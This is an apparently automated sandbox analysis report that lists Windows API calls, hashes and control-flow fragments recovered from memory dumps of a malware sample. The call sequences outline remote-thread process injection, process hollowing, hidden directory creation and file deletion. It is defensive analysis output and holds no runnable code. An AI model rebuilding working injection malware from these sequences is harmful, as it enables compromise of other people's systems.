              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
              • String ID:
              • API String ID: 1099281029-0
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: 482e49ecec93f6808493f0189dbbc3643221c1c1eb3ea815b0c0a648cf82ffd9
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: 84413071640214AFEF129F60CC85FA977ACEF54B44F040199BB49FE0D6DB709A90CA65

              Control-flow Graph

              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000,?,02143FD4,0000000A,?,00000000,0000000A), ref: 02143FFE
              • Sleep.KERNELBASE(000003E8,00000000,?,02143FD4,0000000A,?,00000000,0000000A), ref: 02144020
              • Sleep.KERNELBASE(000007D0), ref: 02144030
              • Sleep.KERNELBASE(00000BB8), ref: 02144040
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: Sleep$HandleModule
              • String ID:
              • API String ID: 3646095425-0
              • Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction ID: d2508506a3db3d0b0c18c91c355d6a00c47bf7d728c49fa506ae27a218957f68
              • Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction Fuzzy Hash: D2F039705C8280EFFB507BB08C89B8D36A99F01709F0400A0EA4EBF495CF78A4608E72

              Control-flow Graph

              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3FD4,0000000A,?,00000000,0000000A), ref: 001C3FFE
              • Sleep.KERNELBASE(000003E8,00000000,?,001C3FD4,0000000A,?,00000000,0000000A), ref: 001C4020
              • Sleep.KERNELBASE(000007D0), ref: 001C4030
              • Sleep.KERNELBASE(00000BB8), ref: 001C4040
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: Sleep$HandleModule
              • String ID:
              • API String ID: 3646095425-0
              • Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction ID: 90a0306340f54f8a0a8555a1ee633c2a62b65fb2f3a667207fde47de25335585
              • Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction Fuzzy Hash: A1F01C7058C280D7EB507BA08C9AF8D36A89F31709F041098BB49AE496CF78C560DE72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 96 1c1386-1c1393 97 1c1399-1c139f 96->97 98 1c1435-1c1436 96->98 97->98 99 1c13a5-1c13bb VirtualProtect 97->99 99->98 100 1c13bd-1c13d0 VirtualAlloc 99->100 100->100 101 1c13d2-1c13d9 100->101 102 1c13dc-1c13ec call 1c0ebd 101->102 105 1c13ee-1c13fc 102->105 106 1c13fe 105->106 107 1c1401-1c142f VirtualProtect 105->107 106->107 107->98
              APIs
              • VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13B3
              • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13C8
              • VirtualProtect.KERNELBASE(?,00000020,?,001C1434,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C142F
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: Virtual$Protect$Alloc
              • String ID:
              • API String ID: 2541858876-0
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: aee6498fc1534bf5843544c719c366106a18b629b188e7960a7d370974955569
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: 5521CD31940256AFDB12DF78C848FACBBB5AF15710F458229F955AF2D1E730E810CB94

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(001C1522,00000006,?,00000000), ref: 001C152D
                • Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA
                • Part of subcall function 001C1386: VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13B3
                • Part of subcall function 001C1386: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13C8
                • Part of subcall function 001C1386: VirtualProtect.KERNELBASE(?,00000020,?,001C1434,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C142F
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: Virtual$Protect$AddressAllocLibraryLoadProc
              • String ID:
              • API String ID: 2821516111-0
              • Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction ID: 84603d99140c77a5ab07f23fff341f14d22a0cbe777f466f71f0401ea30cd6a0
              • Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction Fuzzy Hash: 6511C1B2404614AEEF03AF20C5C4DAA73ECFE51708B450A6EAD85EF44EEF709154CAE5
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataReleaseSignatureVerify
              • String ID:
              • API String ID: 2975711244-0
              • Opcode ID: 74f399d408830fdb48f850e18acc577a4850fe241935dd629d5f7770cec88c7c
              • Instruction ID: a4f1312321eb152d4ef59b1c8091752020c81634f9c2e0a0577efed4f5199756
              • Opcode Fuzzy Hash: 74f399d408830fdb48f850e18acc577a4850fe241935dd629d5f7770cec88c7c
              • Instruction Fuzzy Hash: 0E414E71544218AFEF224F20CC85FE9B7B9AF04B04F1406D5BA89AE095DBB199D0DF94
              APIs
              • CryptAcquireContextA.ADVAPI32(00000000,00000000,02142E9C,0000002F,?,00000000,00000001,F0000000), ref: 02142EDC
              • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 02142F25
              • CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 02142F3F
              • CryptVerifySignatureA.ADVAPI32(?,00000000,00000085,?,00000000,00000000), ref: 02142F5F
              • CryptDestroyHash.ADVAPI32(?), ref: 02142F6D
              • CryptDestroyKey.ADVAPI32(?), ref: 02142F79
              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02142F87
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataReleaseSignatureVerify
              • String ID:
              • API String ID: 2975711244-0
              • Opcode ID: c5cb8e877015542dfdc52913968891db5105916fdbb510e43f81ac8c12f77a0c
              • Instruction ID: fb5deb02ee4b247e3a4412ec69d05e28a0e429fe7e6feeb67b9fb242a5a1a36c
              • Opcode Fuzzy Hash: c5cb8e877015542dfdc52913968891db5105916fdbb510e43f81ac8c12f77a0c
              • Instruction Fuzzy Hash: 9811C631644114ABEF221F20CC85BD97B79AF54704F144294BE8ABD0A4DBB19AE09F58
              APIs
              • VirtualAllocEx.KERNEL32(0000094C,00000000,021459C8,00003000,00000040,?,?,?,02140DC9,00000000,0000094C,00000000), ref: 02140E47
              • WriteProcessMemory.KERNEL32(0000094C,02140000,00000000,021459C8,00000000,?,02140DC9,00000000,0000094C,00000000), ref: 02140E65
              • IsWow64Process.KERNEL32(0000094C,?,?,?,02140DC9,00000000,0000094C,00000000), ref: 02140E7B
              • CreateRemoteThread.KERNEL32(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02140EB1
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
              • String ID:
              • API String ID: 3578747408-0
              • Opcode ID: 079751ffdfe3eadcbe87efa349abbd0bf3a7fcc1013202ef83eaf6d3d040f129
              • Instruction ID: a000fd37d854cfdff69b41fbe31a5c103cd54cb14546f602f8ed463a47e6ce35
              • Opcode Fuzzy Hash: 079751ffdfe3eadcbe87efa349abbd0bf3a7fcc1013202ef83eaf6d3d040f129
              • Instruction Fuzzy Hash: C5118F32140204FFFF109F15CC45F9A3B69EF84754F244051FE48BE595D771A560CAA8

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(0214067F,00000009,?,00000000), ref: 0214068D
                • Part of subcall function 02140CDD: GetProcAddress.KERNEL32(00000000,021404B1), ref: 02140CEA
                • Part of subcall function 021406CE: lstrcat.KERNEL32(00000000,021406C5), ref: 021406DD
                • Part of subcall function 021406CE: lstrcmpiA.KERNEL32(?,00000000), ref: 021406F7
                • Part of subcall function 021406CE: Sleep.KERNEL32(00001388), ref: 0214070A
                • Part of subcall function 021406CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0214072B
                • Part of subcall function 021406CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 0214073D
                • Part of subcall function 021406CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0214075E
                • Part of subcall function 021406CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 02140770
                • Part of subcall function 021406CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 02140791
                • Part of subcall function 021406CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 021407A3
                • Part of subcall function 021406CE: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 021407B7
                • Part of subcall function 021406CE: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 021407FE
                • Part of subcall function 021406CE: Sleep.KERNEL32(00001388), ref: 0214081D
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
              • String ID:
              • API String ID: 3164464694-0
              • Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction ID: 3e945f246d53b4bcc5bf1a59e219d1dc8683f1a4b8b7664f4d57160cd3200111
              • Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction Fuzzy Hash: B1410FB25442149FDB176BA08C88FAA77BCEF44704F4505A9BB89EF055EF309680CEA5

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(001C067F,00000009,?,00000000), ref: 001C068D
                • Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA
                • Part of subcall function 001C06CE: lstrcat.KERNEL32(00000000,001C06C5), ref: 001C06DD
                • Part of subcall function 001C06CE: lstrcmpiA.KERNEL32(?,00000000), ref: 001C06F7
                • Part of subcall function 001C06CE: Sleep.KERNEL32(00001388), ref: 001C070A
                • Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C072B
                • Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C073D
                • Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C075E
                • Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C0770
                • Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C0791
                • Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C07A3
                • Part of subcall function 001C06CE: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001C07B7
                • Part of subcall function 001C06CE: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001C07FE
                • Part of subcall function 001C06CE: Sleep.KERNEL32(00001388), ref: 001C081D
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
              • String ID:
              • API String ID: 3164464694-0
              • Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction ID: 6916e961ec7af8ef0e99d5548a14004a71d42b8846935f748d6844fc744d3216
              • Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction Fuzzy Hash: 25411DB2404214DFDB176BA08889FAA73ACEF54B00F4505ADBB85EF056DF309690CEA5
              APIs
              • lstrcat.KERNEL32(00000000,021406C5), ref: 021406DD
              • lstrcmpiA.KERNEL32(?,00000000), ref: 021406F7
              • Sleep.KERNEL32(00001388), ref: 0214070A
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0214072B
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 0214073D
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0214075E
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 02140770
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 02140791
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 021407A3
              • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 021407B7
              • VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 021407FE
              • Sleep.KERNEL32(00001388), ref: 0214081D
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
              • String ID:
              • API String ID: 2622802024-0
              • Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction ID: 10466fd20799e2928110b70732f5d5c3223c5bd0f9620a420f4d30213afe4071
              • Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction Fuzzy Hash: 493101B25402149FDF166BA0CC89FAA73BCEF44B05F4504A9BB89EF055DF309680CEA5
              APIs
              • lstrcat.KERNEL32(00000000,001C06C5), ref: 001C06DD
              • lstrcmpiA.KERNEL32(?,00000000), ref: 001C06F7
              • Sleep.KERNEL32(00001388), ref: 001C070A
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C072B
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C073D
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C075E
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C0770
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C0791
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C07A3
              • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001C07B7
              • VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001C07FE
              • Sleep.KERNEL32(00001388), ref: 001C081D
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
              • String ID:
              • API String ID: 2622802024-0
              • Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction ID: 7ea33d55d254b196ccdd85eefc5e787c536d3095197ddd6fe78dffc3f5513c5a
              • Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction Fuzzy Hash: 6A31FDB2500214DFDB176BA08C89FAA73BCEF54B00F4504ADBB85EE055DF309690CEA5
              APIs
              • ExpandEnvironmentStringsA.KERNEL32(02142656,00000010,?,?,00000000,00000104), ref: 0214266B
              • lstrcat.KERNEL32(00000000,021426A3), ref: 021426B0
              • lstrcat.KERNEL32(00000000,00000000), ref: 021426C3
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: lstrcat$EnvironmentExpandStrings
              • String ID: \AC\
              • API String ID: 2903145849-1749977576
              • Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction ID: 38c1b7dae47614a83e49aa54762177fd083ac50318e0ac4074edeead8c48d364
              • Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction Fuzzy Hash: 94217A71540148EFEB129F60CC49F9DBBB4EF10704F1441A9FD58EA0A1DB308AA1DB94
              APIs
              • ExpandEnvironmentStringsA.KERNEL32(001C2656,00000010,?,?,00000000,00000104), ref: 001C266B
              • lstrcat.KERNEL32(00000000,001C26A3), ref: 001C26B0
              • lstrcat.KERNEL32(00000000,00000000), ref: 001C26C3
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: lstrcat$EnvironmentExpandStrings
              • String ID: \AC\
              • API String ID: 2903145849-1749977576
              • Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction ID: e4e2971d9f5b256a87e084e92f98be58b8673f9a9e46d99b317538ee14eb21d4
              • Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction Fuzzy Hash: 84218B71500218EFEF129F60CC89F9DBBB4EF20704F1441A9ED54EA1A1D730CA619B64
              APIs
              • CreateProcessA.KERNEL32(00000000,02140A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 02140A21
              • GetThreadContext.KERNEL32(?,00000000), ref: 02140A49
              • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02140A74
              • DuplicateHandle.KERNEL32(000000FF,000000FF,?,021459C8,00000000,00000000,00000002), ref: 02140AB9
              • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02140AE7
              • ResumeThread.KERNEL32(?), ref: 02140AF7
              • Sleep.KERNEL32(000003E8), ref: 02140B07
              • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02140B1E
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
              • String ID:
              • API String ID: 617592159-0
              • Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction ID: 44d87a40696e44dc199b1f44e565df551ce95c6a8e033ab547aaa378e9bbf21f
              • Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction Fuzzy Hash: F9314C71640258AFEF268F51CC85FA977B8EF08748F080198AB49FE0E5DB709690CE64
              APIs
              • CreateProcessA.KERNEL32(00000000,001C0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001C0A21
              • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A49
              • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A74
              • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C59C8,00000000,00000000,00000002), ref: 001C0AB9
              • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AE7
              • ResumeThread.KERNEL32(?), ref: 001C0AF7
              • Sleep.KERNEL32(000003E8), ref: 001C0B07
              • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0B1E
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
              • String ID:
              • API String ID: 617592159-0
              • Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction ID: 2067751bc769af6727e3ef1839da84b1b4ae6cc8dc197e2e45a006881c8fd9f5
              • Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction Fuzzy Hash: 6E314F716402549FEF238F10CC85FA977B8EF18744F080198AA49FE0E6DB70DA90CE64
              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02140D48
              • Sleep.KERNEL32(000003E8), ref: 02140D5E
              • Process32First.KERNEL32(?,00000000), ref: 02140D7E
              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 02140DB3
              • CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 02140DC9
              • Process32Next.KERNEL32(?,?), ref: 02140DDF
              • CloseHandle.KERNEL32(?), ref: 02140E0B
              • Sleep.KERNEL32(000003E8), ref: 02140E16
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
              • String ID:
              • API String ID: 2496627043-0
              • Opcode ID: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
              • Instruction ID: 317179c7c75e7cf442f9d9013dfb3c1b0dbae3168c1e44f765070d0c0f2fa045
              • Opcode Fuzzy Hash: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
              • Instruction Fuzzy Hash: 9D21AC30942114ABEF2A5F25CC54AE9B7B9AF48700F0901E9EA1DFA195CF329A94CF54
              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001C0D48
              • Sleep.KERNEL32(000003E8), ref: 001C0D5E
              • Process32First.KERNEL32(?,00000000), ref: 001C0D7E
              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 001C0DB3
              • CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 001C0DC9
              • Process32Next.KERNEL32(?,?), ref: 001C0DDF
              • CloseHandle.KERNEL32(?), ref: 001C0E0B
              • Sleep.KERNEL32(000003E8), ref: 001C0E16
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
              • String ID:
              • API String ID: 2496627043-0
              • Opcode ID: 664d63de3b9fafb3872cc365957f5438018d784fa8db0df2d7663aaabb95b3c8
              • Instruction ID: 724837a767e616bbb3b298c250941228e268248473bfe5bfc93ac98464869d00
              • Opcode Fuzzy Hash: 664d63de3b9fafb3872cc365957f5438018d784fa8db0df2d7663aaabb95b3c8
              • Instruction Fuzzy Hash: D1217F31911124EBEF225FA4CC54BEDB7B9AF48701F0901E9F90AEA195CB309E908F55
              APIs
              • Sleep.KERNEL32(00000064), ref: 02142A60
                • Part of subcall function 02142BBB: Sleep.KERNEL32(00002710), ref: 02142C2C
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02142B02
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02142B46
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02142B9C
              • Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02142BB0
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: DeleteFileSleep
              • String ID:
              • API String ID: 3161721237-0
              • Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction ID: bea3e1487998dc4f4fbab4d60ce54c6e7c5bea0830dc8d7bc39a9371bbf92a2c
              • Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction Fuzzy Hash: 2E3114715802559EEB326F71CC88FAB76BCAF90709F4005A9BE8DDA051DF7496C0CEA1
              APIs
              • Sleep.KERNEL32(00000064), ref: 001C2A60
                • Part of subcall function 001C2BBB: Sleep.KERNEL32(00002710), ref: 001C2C2C
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2B02
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2B46
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B9C
              • Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2BB0
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: DeleteFileSleep
              • String ID:
              • API String ID: 3161721237-0
              • Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction ID: 275fb6263abb37eef3e3e71df306651d1210d5ae5ccfddcb04249f26a9e9dd2e
              • Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction Fuzzy Hash: 5B310171500269AFEB266F71CC89FAB77BCAFB0704F44049DEA45DA051DF74DA80CAA1
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 021432E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 02143330
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,021432B1,00000011,?,00000000,00A00000), ref: 0214335D
